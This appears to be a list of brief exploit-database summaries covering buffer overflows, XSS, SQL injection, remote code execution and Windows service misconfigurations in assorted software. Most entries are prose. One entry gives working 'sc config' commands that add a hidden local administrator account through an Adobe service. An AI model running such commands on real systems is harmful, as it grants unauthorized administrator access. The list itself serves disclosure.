A local privilege escalation attack against the community supported version of Real.com's Realplayer, version 9. By default, configuration files are stored in ~$USER/.realnetworks/ and are group writeable. A malicious local user can edit the config files of fellow users to perform unauthorized actions. The attack involves modifying the path to shared libraries and writing malicious shared libraries.
This exploit targets the Winmod 1.4 (.lst) software on Windows XP SP3. It utilizes a stack overflow vulnerability to execute arbitrary code. The exploit overwrites the return address (RET) and structured exception handler (SEH) to gain control of the program. It then injects shellcode to execute a calculator application. The shellcode used in this exploit is based on the Metasploit framework.
A stored cross-site scripting vulnerability exists in the Responsive E-Learning System 1.0, which allows an attacker to inject malicious JavaScript code into the application. By exploiting this vulnerability, an attacker can gain access to the application and execute malicious code on the victim's browser.
The 'id=' parameter in Responsive E-Learning System is vulnerable to Sql Injection.
A vulnerability in ManageEngine ADSelfService Plus could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. The vulnerability exists due to insufficient validation of user-supplied data. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted system. A successful exploit could allow the attacker to execute arbitrary code on the system with the privileges of the web server process.
GoldWave 5.70 is vulnerable to a buffer overflow vulnerability when a specially crafted file is opened. This can be exploited to execute arbitrary code by corrupting the SEH chain and overwriting the return address with a pointer to the malicious code. The vulnerability is triggered when a user opens a specially crafted file with the application.
The script injection vulnerability allows an attacker to inject malicious scripts into a webpage, which can be executed by the victim's browser. In this specific case, the vulnerability is present in both VBScript and JavaScript sections of the code.
This code demonstrates a stack overflow vulnerability in Gaim 1.2.1 when processing email addresses. It causes a segfault when executing the /vuln command in a conversation. If a protocol allows a 10002-character message to go through, it also segfaults the recipient. The vulnerability is due to the stack being overwritten with 'A's and the return address of the function being set to 0x41414141.
To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available: sc stop "AdobeActiveFileMonitor8.0" sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add" sc start "AdobeActiveFileMonitor8.0" runas /noprofile /user:%COMPUTERNAME%adobe cmd
The 'WebDrive Service' is installed with an empty security descriptor. A malicious user can stop the service, then invoke the 'sc config' command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges.
Services By CQR
